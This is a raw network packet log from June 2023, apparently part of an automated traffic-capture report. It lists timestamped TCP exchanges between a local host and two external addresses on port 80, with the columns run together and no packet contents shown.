                                                                                                  Jun 21, 2023 20:24:11.386002064 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386015892 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.386048079 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386058092 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.386096001 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386142969 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386157990 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.386190891 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386240005 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386251926 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.386285067 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386298895 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.386332035 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386383057 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386430979 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386478901 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386524916 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386524916 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.386574030 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386590004 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.386590004 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.386657000 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386703968 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386718035 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.386750937 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386796951 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386842012 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386861086 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.386888027 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386934042 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386955023 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.386982918 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.386984110 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.387029886 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387074947 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387088060 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.387121916 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387167931 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387181997 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.387213945 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387260914 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387305975 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387316942 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.387352943 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387401104 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387408018 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.387445927 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387491941 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387505054 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.387541056 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387550116 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.387609959 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387655973 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387670040 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.387701988 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387748003 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387768984 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.387794018 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387837887 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387866020 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.387883902 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387928963 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.387945890 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.387974977 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388020992 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388068914 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388094902 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.388115883 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388161898 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388169050 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.388206959 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388298035 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388308048 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.388345957 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388364077 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.388395071 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388441086 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388458014 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.388488054 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388534069 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388557911 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.388582945 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388629913 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388675928 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388688087 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.388724089 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388772011 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388816118 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388825893 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.388825893 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.388861895 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388909101 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.388931036 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.388953924 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389000893 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389029980 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.389048100 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389094114 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389141083 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389168024 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.389185905 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389234066 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389255047 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.389280081 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389313936 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.389333963 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389381886 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389430046 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389470100 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.389476061 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389525890 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389539957 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.389575005 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389624119 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389632940 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.389669895 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389714956 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389746904 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.389766932 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389812946 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389843941 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389875889 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389906883 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389923096 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.389945030 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.389961958 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.389995098 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390026093 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390073061 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390113115 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.390157938 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390162945 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.390203953 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390249968 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390265942 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.390297890 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390343904 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390357971 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.390389919 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390436888 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390448093 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.390481949 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390490055 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.390527964 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390577078 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390584946 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.390620947 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390667915 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390678883 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.390713930 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390760899 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390806913 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390819073 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.390853882 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390901089 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390945911 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.390969992 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.390990019 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.391036034 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.391081095 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.391127110 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.391158104 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.391175985 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.391177893 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.392997980 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.398787975 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.398833036 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.398866892 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.398900032 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.398941040 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399008989 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399008989 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399105072 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399167061 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399178028 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399199963 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399234056 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399245977 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399270058 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399295092 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399295092 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399303913 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399337053 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399364948 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399368048 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399389029 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399400949 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399434090 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399436951 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399461985 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399466038 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399486065 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399499893 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399517059 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399533033 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399553061 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399566889 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399585962 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399602890 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399619102 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399636984 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399657965 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399669886 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399693012 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399703026 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399724007 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399739981 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399755955 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399771929 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399796009 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399805069 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399832964 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399837017 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399857998 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399871111 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399889946 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399904013 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399935007 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399935961 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.399957895 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.399971008 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400002956 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400033951 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400036097 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400065899 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400070906 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400090933 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400104046 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400125980 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400136948 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400170088 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400182962 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400203943 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400213003 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400235891 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400253057 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400295019 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400306940 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400306940 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400329113 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400361061 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400393009 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400425911 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400458097 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400490999 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400522947 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400547981 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400557041 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400573969 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400589943 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400623083 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400651932 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400655031 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400677919 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400687933 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400718927 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400719881 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400746107 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400754929 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400770903 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400789022 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400816917 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400820017 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400840998 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400852919 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400878906 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400887012 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400904894 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400921106 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400948048 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400953054 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.400976896 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.400989056 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401015043 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.401022911 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401045084 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.401055098 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401087999 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401113987 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.401113987 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.401119947 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401154041 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401185036 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401196957 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.401197910 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.401218891 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401233912 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.401233912 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.401252985 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401285887 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401288033 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.401313066 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.401319981 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401335955 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.401354074 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401375055 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.401386023 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401418924 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401444912 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.401451111 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401468992 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.401484966 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401516914 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401551008 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401556969 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.401582956 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.401583910 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401618004 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401621103 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.401645899 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.401652098 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.401674032 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.401702881 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:11.413974047 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.416095018 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.416438103 CEST804971945.9.74.80192.168.2.4
